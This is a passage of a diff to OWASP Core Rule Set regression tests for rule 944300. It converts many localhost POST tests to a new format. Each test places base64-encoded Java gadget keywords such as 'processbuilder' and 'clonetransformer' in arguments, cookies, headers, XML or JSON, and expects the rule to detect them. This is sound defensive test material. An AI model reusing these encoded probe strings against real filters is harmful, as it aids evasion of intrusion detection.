keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HByb2Nlc3NidWlsZGVy=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-49 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HByb2Nlc3NidWlsZGVy=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 49 desc: "Request header test includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: HByb2Nlc3NidWlsZGVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-50 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + test: HByb2Nlc3NidWlsZGVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 50 desc: "XML attribute value includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-51 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 51 desc: "XML element value includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb2Nlc3NidWlsZGVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-52 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb2Nlc3NidWlsZGVy" + output: + log: + expect_ids: [944300] + - test_id: 52 desc: "Nested XML element value includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb2Nlc3NidWlsZGVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-53 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb2Nlc3NidWlsZGVy" + output: + log: + expect_ids: [944300] + - test_id: 53 desc: "Content-Type text/plain includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HByb2Nlc3NidWlsZGVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-54 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HByb2Nlc3NidWlsZGVy" + output: + log: + expect_ids: [944300] + - test_id: 54 desc: "Content-Type application/json arg value includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"HByb2Nlc3NidWlsZGVy\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-55 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"HByb2Nlc3NidWlsZGVy\"}" + output: + log: + expect_ids: [944300] + - test_id: 55 desc: "Content-Type application/json arg name includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"HByb2Nlc3NidWlsZGVy\": \"test\"}" - output: - log_contains: "id 
\"944300\"" - - test_title: 944300-56 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"HByb2Nlc3NidWlsZGVy\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 56 desc: "Argument test includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bwcm9jZXNzYnVpbGRlcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-57 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bwcm9jZXNzYnVpbGRlcg" + output: + log: + expect_ids: [944300] + - test_id: 57 desc: "Argument name includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm9jZXNzYnVpbGRlcg=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-58 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm9jZXNzYnVpbGRlcg=test" + output: + log: + expect_ids: [944300] + - test_id: 58 desc: "Cookie test includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Bwcm9jZXNzYnVpbGRlcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-59 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bwcm9jZXNzYnVpbGRlcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 59 desc: "Cookie name includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Bwcm9jZXNzYnVpbGRlcg=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-60 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bwcm9jZXNzYnVpbGRlcg=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 60 desc: "Request header test includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Bwcm9jZXNzYnVpbGRlcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-61 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bwcm9jZXNzYnVpbGRlcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 61 desc: 
"XML attribute value includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-62 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 62 desc: "XML element value includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm9jZXNzYnVpbGRlcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-63 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm9jZXNzYnVpbGRlcg" 
+ output:
+ log:
+ expect_ids: [944300]
+ - test_id: 63
 desc: "Nested XML element value includes keyword Bwcm9jZXNzYnVpbGRlcg"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "Bwcm9jZXNzYnVpbGRlcg"
- output:
- log_contains: "id \"944300\""
- - test_title: 944300-64
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "Bwcm9jZXNzYnVpbGRlcg"
+ output:
+ log:
+ expect_ids: [944300]
+ - test_id: 64
 desc: "Content-Type text/plain includes keyword Bwcm9jZXNzYnVpbGRlcg"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "text/plain"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=Bwcm9jZXNzYnVpbGRlcg"
- output:
- log_contains: "id \"944300\""
- - test_title: 944300-65
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+
method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bwcm9jZXNzYnVpbGRlcg" + output: + log: + expect_ids: [944300] + - test_id: 65 desc: "Content-Type application/json arg value includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Bwcm9jZXNzYnVpbGRlcg\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-66 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Bwcm9jZXNzYnVpbGRlcg\"}" + output: + log: + expect_ids: [944300] + - test_id: 66 desc: "Content-Type application/json arg name includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Bwcm9jZXNzYnVpbGRlcg\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-67 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Bwcm9jZXNzYnVpbGRlcg\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 67 desc: "Argument test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-68 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 68 desc: "Argument name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Y2xvbmV0cmFuc2Zvcm1lcg=test" - output: - log_contains: "id 
\"944300\"" - - test_title: 944300-69 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Y2xvbmV0cmFuc2Zvcm1lcg=test" + output: + log: + expect_ids: [944300] + - test_id: 69 desc: "Cookie test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Y2xvbmV0cmFuc2Zvcm1lcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-70 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Y2xvbmV0cmFuc2Zvcm1lcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 70 desc: "Cookie name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Y2xvbmV0cmFuc2Zvcm1lcg=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-71 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Y2xvbmV0cmFuc2Zvcm1lcg=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 71 desc: "Request header test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Y2xvbmV0cmFuc2Zvcm1lcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-72 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Y2xvbmV0cmFuc2Zvcm1lcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 72 desc: "XML attribute value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: 
"localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-73 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 73 desc: "XML element value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Y2xvbmV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-74 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 74 desc: "Nested XML element value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: 
